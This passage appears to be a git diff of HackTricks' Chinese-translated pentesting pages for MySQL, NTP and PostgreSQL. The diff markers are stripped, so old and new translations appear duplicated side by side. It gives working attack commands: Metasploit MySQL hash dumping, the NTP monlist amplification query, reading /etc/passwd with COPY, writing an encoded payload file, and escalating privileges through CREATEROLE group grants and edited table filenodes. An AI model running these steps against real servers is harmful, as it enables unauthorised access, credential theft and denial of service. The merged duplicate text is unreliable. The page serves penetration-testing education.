x$user_summary_by_file_io_type\
x$user_summary_by_stages\
x$user_summary_by_statement_latency\
x$user_summary_by_statement_type\
x$wait_classes_global_by_avg_latency\
x$wait_classes_global_by_latency\
x$waits_by_host_by_latency\
x$waits_by_user_by_latency\
x$waits_global_by_latency
x$statement\_analysis\
x$statements\_with\_errors\_or\_warnings\
x$statements\_with\_full\_table\_scans\
x$statements\_with\_runtimes\_in\_95th\_percentile\
x$statements\_with\_sorting\
x$statements\_with\_temp\_tables\
x$user\_summary\
x$user\_summary\_by\_file\_io\
x$user\_summary\_by\_file\_io\_type\
x$user\_summary\_by\_stages\
x$user\_summary\_by\_statement\_latency\
x$user\_summary\_by\_statement\_type\
x$wait\_classes\_global\_by\_avg\_latency\
x$wait\_classes\_global\_by\_latency\
x$waits\_by\_host\_by\_latency\
x$waits\_by\_user\_by\_latency\
x$waits\_global\_by\_latency
{% endtab %}
{% endtabs %}
## HackTricks Automatic Commands
```
## HackTricks 自动命令
```
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
@ -631,24 +632,23 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
```
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动之一,也是**欧洲**最重要的活动之一。以**促进技术知识**为使命,这个大会是技术和网络安全专业人士在各个领域的热点交流会
[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的活动之一。该大会 **旨在促进技术知识**,是各个学科技术和网络安全专业人士的热烈交流平台
{% embed url="https://www.rootedcon.com/" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

82
network-services-pentesting/pentesting-ntp.md
View file

@ -1,46 +1,48 @@
# 123/udp - 网络时间协议NTP渗透测试
# 123/udp - Pentesting NTP
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
{% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客行为的刺激和挑战的内容
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
通过最新的赏金计划发布和重要平台更新保持信息更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy)立即与顶尖黑客合作!
**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作
## 基本信息
**网络时间协议NTP** 确保计算机和网络设备在变化的延迟网络中准确同步其时钟。在IT运营、安全和日志记录中保持精确的时间记录至关重要。NTP的准确性至关重要,但如果管理不当,也会带来安全风险。
**网络时间协议 (NTP)** 确保计算机和网络设备在可变延迟网络中准确同步时钟。它对于维护 IT 操作、安全性和日志记录中的精确计时至关重要。NTP 的准确性至关重要,但如果管理不当,也会带来安全风险。
### 摘要安全提示:
### 摘要安全提示:
* **目的**:在网络上同步设备时钟。
* **重要性**:对安全、日志记录和运营至关重要。
* **重要性**:对安全、日志记录和操作至关重要。
* **安全措施**
* 使用带有身份验证的可信NTP来源。
* 限制NTP服务器的网络访问。
* 监控同步以发现篡改迹象。
* 使用带有身份验证的可信 NTP 源。
* 限制 NTP 服务器的网络访问。
* 监控同步以发现篡改迹象。
**默认端口:** 123/udp
```
@ -61,17 +63,17 @@ ntpdc -c sysinfo <IP_ADDRESS>
```bash
nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 <IP>
```
## 检查配置文件
## Examine configuration files
* ntp.conf
## NTP放大攻击
## NTP Amplification Attack
[**NTP DDoS攻击的工作原理**](https://resources.infosecinstitute.com/network-time-protocol-ntp-threats-countermeasures/#gref)
**NTP协议**使用UDP允许在无需握手程序的情况下运行与TCP不同。这种特性被利用在**NTP DDoS放大攻击**中。攻击者创建带有虚假源IP的数据包使攻击请求看起来来自受害者。这些数据包最初很小促使NTP服务器以更大的数据量做出响应放大了攻击。
**NTP协议**使用UDP允许在不需要握手程序的情况下操作这与TCP不同。这个特性在**NTP DDoS放大攻击**中被利用。在这里攻击者创建带有假源IP的包使攻击请求看起来像是来自受害者。这些最初较小的包促使NTP服务器以更大的数据量进行响应从而放大攻击。
_**MONLIST**_命令虽然很少使用但可以报告最近连接到NTP服务的600个客户端。尽管该命令本身很简单但在这些攻击中的误用突显了关键的安全漏洞。
尽管_**MONLIST**_命令使用较少但可以报告最后600个连接到NTP服务的客户端。虽然该命令本身很简单但在此类攻击中的误用突显了关键的安全漏洞。
```bash
ntpdc -n -c monlist <IP>
```
@ -79,7 +81,7 @@ ntpdc -n -c monlist <IP>
* `ntp`
## HackTricks自动命令
## HackTricks 自动命令
```
Protocol_Name: NTP #Protocol Abbreviation if there is one.
Port_Number: 123 #Comma separated if there is more than one.
@ -98,33 +100,33 @@ Name: Nmap
Description: Enumerate NTP
Command: nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 {IP}
```
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客行为的刺激和挑战的内容
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
了解最新的赏金任务发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作吧!
**今天就加入我们,** [**Discord**](https://discord.com/invite/N3FrSbmwdy),开始与顶级黑客合作吧!
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
</details>
{% endhint %}

361
network-services-pentesting/pentesting-postgresql.md
View file

@ -1,37 +1,38 @@
# 5432,5433 - 渗透测试Postgresql
# 5432,5433 - Pentesting Postgresql
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=pentesting-postgresql) 可轻松构建和**自动化工作流程**,利用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=pentesting-postgresql) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pentesting-postgresql" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## **基本信息**
**PostgreSQL** 被描述为一种**面向对象的关系型数据库系统**,是**开源**的。该系统不仅使用SQL语言还通过附加功能增强了它。其功能使其能够处理各种数据类型和操作使其成为开发人员和组织的多功能选择。
**PostgreSQL** 被描述为一**对象关系数据库系统**,是 **开源** 的。该系统不仅使用 SQL 语言,还通过额外的功能增强了它。它的能力使其能够处理各种数据类型和操作,成为开发人员和组织的多功能选择。
**默认端口:**5432如果此端口已被使用PostgreSQL似乎会使用下一个未被使用的端口可能是5433
**默认端口:** 5432如果此端口已被使用似乎 PostgreSQL 将使用下一个未使用的端口(可能是 5433
```
PORT STATE SERVICE
5432/tcp open pgsql
```
## 连接 & 基本枚举
## 连接基本枚举
```bash
psql -U <myuser> # Open psql console with user
psql -h <host> -U <username> -d <database> # Remote connection
@ -72,10 +73,10 @@ SELECT * FROM pg_extension;
\s
```
{% hint style="warning" %}
如果运行 **`\list`** 命令发现一个名为 **`rdsadmin`** 的数据库,那么你就知道你在一个 **AWS postgresql数据库** 内。
如果运行 **`\list`** 发现一个名为 **`rdsadmin`** 的数据库,你就知道你在一个 **AWS postgresql 数据库** 内
{% endhint %}
要了解更多关于**如何滥用PostgreSQL数据库**的信息,请查看:
有关 **如何滥用 PostgreSQL 数据库** 的更多信息,请查看:
{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/" %}
[postgresql-injection](../pentesting-web/sql-injection/postgresql-injection/)
@ -90,7 +91,7 @@ msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection
### **端口扫描**
根据[**这项研究**](https://www.exploit-db.com/papers/13084),当连接尝试失败时,`dblink`会抛出一个`sqlclient_unable_to_establish_sqlconnection`异常,其中包括错误的解释。以下是这些细节的示例。
根据[**这项研究**](https://www.exploit-db.com/papers/13084),当连接尝试失败时,`dblink`会抛出一个`sqlclient_unable_to_establish_sqlconnection`异常,其中包含错误的解释。以下列出了这些细节的示例。
```sql
SELECT * FROM dblink_connect('host=1.2.3.4
port=5678
@ -99,9 +100,9 @@ password=secret
dbname=abc
connect_timeout=10');
```
* 主机已宕机
* 主机已关闭
```DETAIL: 无法连接到服务器: 主机不可达 服务器是否在主机"1.2.3.4"上运行并接受端口5678上的TCP/IP连接```
`DETAIL: 无法连接到服务器:没有到主机的路由 服务器是否在主机 "1.2.3.4" 上运行并在端口 5678 上接受 TCP/IP 连接?`
* 端口已关闭
```
@ -113,59 +114,7 @@ running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
DETAIL: server closed the connection unexpectedly This probably means
the server terminated abnormally before or while processing the request
```
### PostgreSQL
#### PostgreSQL Enumeration
PostgreSQL枚举
1. **Banner Grabbing**
使用Telnet或Netcat检索PostgreSQL服务器的横幅信息。
2. **Version Detection**
使用Nmap或Metasploit等工具检测PostgreSQL服务器的版本信息。
3. **Enumerating Databases**
使用SQL查询或工具如Metasploit枚举PostgreSQL服务器上的数据库。
4. **Enumerating Users**
使用SQL查询或工具如Metasploit枚举PostgreSQL服务器上的用户。
5. **Enumerating Tables**
使用SQL查询或工具如Metasploit枚举PostgreSQL服务器上的表格。
6. **Enumerating Columns**
使用SQL查询或工具如Metasploit枚举PostgreSQL服务器上表格的列。
#### PostgreSQL Exploitation
PostgreSQL利用
1. **Weak Passwords**
尝试使用常见密码或密码爆破工具对PostgreSQL服务器进行密码破解。
2. **SQL Injection**
利用应用程序中存在的SQL注入漏洞来访问或篡改PostgreSQL数据库。
3. **Privilege Escalation**
利用PostgreSQL服务器上存在的特权升级漏洞获取更高级别的访问权限。
4. **File Inclusion**
利用PostgreSQL服务器上存在的文件包含漏洞执行恶意代码。
5. **Buffer Overflow**
利用PostgreSQL服务器上存在的缓冲区溢出漏洞执行恶意代码。
```
DETAIL: FATAL: password authentication failed for user "name"
```
@ -174,24 +123,26 @@ DETAIL: FATAL: password authentication failed for user "name"
DETAIL: could not connect to server: Connection timed out Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
```
## 特权枚举
在 PL/pgSQL 函数中,目前无法获取异常详细信息。然而,如果您可以直接访问 PostgreSQL 服务器,您可以检索所需的信息。如果从系统表中提取用户名和密码不可行,您可以考虑利用前一节讨论的字典攻击方法,因为它可能会产生积极的结果。
## 权限枚举
### 角色
| 角色类型 | |
| 角色类型 | |
| -------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------- |
| rolsuper | 角色具有超级用户权 |
| rolinherit | 角色自动继承其成员角色的权 |
| rolcreaterole | 角色可以创建更多角色 |
| rolsuper | 角色具有超级用户权 |
| rolinherit | 角色自动继承其成员角色的权 |
| rolcreaterole | 角色可以创建更多角色 |
| rolcreatedb | 角色可以创建数据库 |
| rolcanlogin | 角色可以登录。也就是说,此角色可以作为初始会话授权标识符 |
| rolreplication | 角色是复制角色。复制角色可以启动复制连接并创建和删除复制槽。 |
| rolconnlimit | 对于可以登录的角色,设置此角色可以建立的并发连接的最大数量。-1表示无限制。 |
| rolcanlogin | 角色可以登录。也就是说,这个角色可以作为初始会话授权标识符 |
| rolreplication | 角色是一个复制角色。复制角色可以启动复制连接并创建和删除复制槽。 |
| rolconnlimit | 对于可以登录的角色,这设置了该角色可以建立的最大并发连接数。-1 表示没有限制。 |
| rolpassword | 不是密码(始终显示为 `********` |
| rolvaliduntil | 密码过期时间(仅用于密码身份验证如果没有到期则为null |
| rolbypassrls | 角色绕过每个行级安全策略,请参阅[Section 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html)获取更多信息。 |
| rolconfig | 运行时配置变量的角色特定默认值 |
| oid | 角色的ID |
| rolvaliduntil | 密码过期时间(仅用于密码认证);如果没有过期则为 null |
| rolbypassrls | 角色绕过每个行级安全策略,更多信息请参见 [第 5.8 节](https://www.postgresql.org/docs/current/ddl-rowsecurity.html)。 |
| rolconfig | 角色特定的运行时配置变量默认值 |
| oid | 角色的 ID |
#### 有趣的组
@ -200,7 +151,7 @@ running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
* 如果您是 **`pg_write_server_files`** 的成员,您可以 **写入** 文件
{% hint style="info" %}
请注意,在Postgres中**用户**、**组**和**角色**是**相同的**。这取决于**您如何使用**它以及是否**允许登录**
请注意,在 Postgres 中,**用户**、**组**和**角色**是 **相同** 的。这仅取决于 **您如何使用它** 以及您是否 **允许它登录**
{% endhint %}
```sql
# Get users roles
@ -283,7 +234,7 @@ SELECT * FROM pg_proc;
### 读取目录和文件
从这个[**提交**](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a)中,定义的**`DEFAULT_ROLE_READ_SERVER_FILES`**组成员(称为**`pg_read_server_files`**)和**超级用户**可以在任何路径上使用**`COPY`**方法(查看`genfile.c`中的`convert_and_check_filename`:
来自这个 [**提交** ](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) 的定义 **`DEFAULT_ROLE_READ_SERVER_FILES`** 组的成员(称为 **`pg_read_server_files`**)和 **超级用户** 可以在任何路径上使用 **`COPY`** 方法(查看 `convert_and_check_filename``genfile.c` 中):
```sql
# Read file
CREATE TABLE demo(t text);
@ -291,14 +242,14 @@ COPY demo from '/etc/passwd';
SELECT * FROM demo;
```
{% hint style="warning" %}
请记住,如果您不是超级用户但具有 **CREATEROLE** 权限,则可以 **将自己添加到该组中**
请记住,如果您不是超级用户但拥有 **CREATEROLE** 权限,您可以 **使自己成为该组的成员**
```sql
GRANT pg_read_server_files TO username;
```
[**更多信息**](pentesting-postgresql.md#privilege-escalation-with-createrole)
[**更多信息**](pentesting-postgresql.md#privilege-escalation-with-createrole)
{% endhint %}
**其他的postgres函数**可以用来**读取文件或列出目录**。只有**超级用户**和**具有显式权限**的用户可以使用它们:
**其他 postgres 函数** 可以用来 **读取文件或列出目录**。只有 **超级用户****具有明确权限的用户** 可以使用它们:
```sql
# Before executing these function go to the postgres DB (not in the template1)
\c postgres
@ -322,30 +273,32 @@ SHOW data_directory;
GRANT pg_read_server_files TO username;
# Check CREATEROLE privilege escalation
```
你可以在[https://www.postgresql.org/docs/current/functions-admin.html](https://www.postgresql.org/docs/current/functions-admin.html)找到**更多函数**
您可以在 [https://www.postgresql.org/docs/current/functions-admin.html](https://www.postgresql.org/docs/current/functions-admin.html) 找到 **更多函数**
### 简单文件写入
只有**超级用户**和**`pg_write_server_files`**成员可以使用`copy`来写入文件。
只有 **超级用户****`pg_write_server_files`** 的成员可以使用 copy 写入文件。
{% code overflow="wrap" %}
```sql
copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/just/a/path.exec';
```
{% endcode %}
{% hint style="warning" %}
请记住,如果您不是超级用户,但具有**`CREATEROLE`**权限,则可以**将自己添加到该组中**
请记住,如果您不是超级用户但拥有 **`CREATEROLE`** 权限,您可以 **使自己成为该组的成员**
```sql
GRANT pg_write_server_files TO username;
```
[**更多信息**](pentesting-postgresql.md#privilege-escalation-with-createrole)
[**更多信息**](pentesting-postgresql.md#privilege-escalation-with-createrole)
{% endhint %}
请记住COPY 无法处理换行符,因此即使您使用 base64 负载,**您也需要发送一行命令**。\
这种技术的一个非常重要的限制是**`copy` 无法用于编写二进制文件,因为它会修改一些二进制值。**
请记住COPY无法处理换行符因此即使您使用的是base64有效负载**您需要发送一行代码**。\
此技术的一个非常重要的限制是**`copy`无法用于写入二进制文件,因为它会修改某些二进制值。**
### **上传二进制文件**
### **二进制文件上传**
然而,还有**其他技术可以上传大二进制文件:**
然而,还有**其他技术可以上传大二进制文件:**
{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md" %}
[big-binary-files-upload-postgresql.md](../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md)
@ -353,36 +306,36 @@ GRANT pg_write_server_files TO username;
## <img src="../.gitbook/assets/i3.png" alt="" data-size="original">
**漏洞赏金提示****注册** Intigriti这是一个由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
### 通过本地文件写入更新 PostgreSQL 表数据
### 通过本地文件写入更新PostgreSQL表数据
如果您有必要的权限来读取和写入 PostgreSQL 服务器文件,您可以通过**覆盖关文件节点**在[PostgreSQL 数据目录](https://www.postgresql.org/docs/8.1/storage.html)中的任何表来更新服务器上的任何表。有关此技术的**更多信息**[**在这里**](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users)。
如果您有读取和写入PostgreSQL服务器文件的必要权限,您可以通过**覆盖关联的文件节点**来更新服务器上的任何表,在[PostgreSQL数据目录](https://www.postgresql.org/docs/8.1/storage.html)中。**有关此技术的更多信息** [**在这里**](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users)。
所需步骤:
1. 获取 PostgreSQL 数据目录
1. 获取PostgreSQL数据目录
```sql
SELECT setting FROM pg_settings WHERE name = 'data_directory';
```
**注意:** 如果无法从设置中检索当前数据目录路径,您可以通过 `SELECT version()` 查询获取主要的 PostgreSQL 版本,并尝试暴力破解路径。在 Unix 上安装的 PostgreSQL 的常见数据目录路径为 `/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/`。常见的集群名称是 `main`
2. 获取与目标表关联的文件节点的相对路径
**注意:**如果无法从设置中检索当前数据目录路径,可以通过`SELECT version()`查询获取主要PostgreSQL版本并尝试暴力破解路径。在Unix安装的PostgreSQL中常见的数据目录路径是`/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/`。一个常见的集群名称是`main`
2. 获取与目标表关联的文件节点的相对路径
```sql
SELECT pg_relation_filepath('{TABLE_NAME}')
```
此查询应返回类似 `base/3/1337` 的内容。磁盘上的完整路径将是 `$DATA_DIRECTORY/base/3/1337`,即 `/var/lib/postgresql/13/main/base/3/1337`
3. 通过 `lo_*` 函数下载文件节点
此查询应返回类似`base/3/1337`的内容。磁盘上的完整路径将是`$DATA_DIRECTORY/base/3/1337`,即`/var/lib/postgresql/13/main/base/3/1337`。
3. 通过`lo_*`函数下载文件节点
```sql
SELECT lo_import('{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}',13337)
```
4. 获取与目标表关联的数据类型
4. 获取与目标表关联的数据类型
```sql
SELECT
@ -403,33 +356,33 @@ JOIN pg_class
ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = '{TABLE_NAME}';
```
5. 使用[PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor)来[编辑文件节点](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users);将所有 `rol*` 布尔标志设置为 1 以获取完全权限。
5. 使用[PostgreSQL文件节点编辑器](https://github.com/adeadfed/postgresql-filenode-editor)来[编辑文件节点](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users);将所有`rol*`布尔标志设置为1以获得完全权限。
```bash
python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {DATATYPE_CSV_FROM_STEP_4} -m update -p 0 -i ITEM_ID --csv-data {CSV_DATA}
```
![PostgreSQL Filenode Editor 演示](https://raw.githubusercontent.com/adeadfed/postgresql-filenode-editor/main/demo/demo_datatype.gif)
6. 通过 `lo_*` 函数重新上传编辑后的文件节点,并覆盖磁盘上的原始文件
![PostgreSQL文件节点编辑器演示](https://raw.githubusercontent.com/adeadfed/postgresql-filenode-editor/main/demo/demo\_datatype.gif)
6. 通过`lo_*`函数重新上传编辑后的文件节点,并覆盖磁盘上的原始文件
```sql
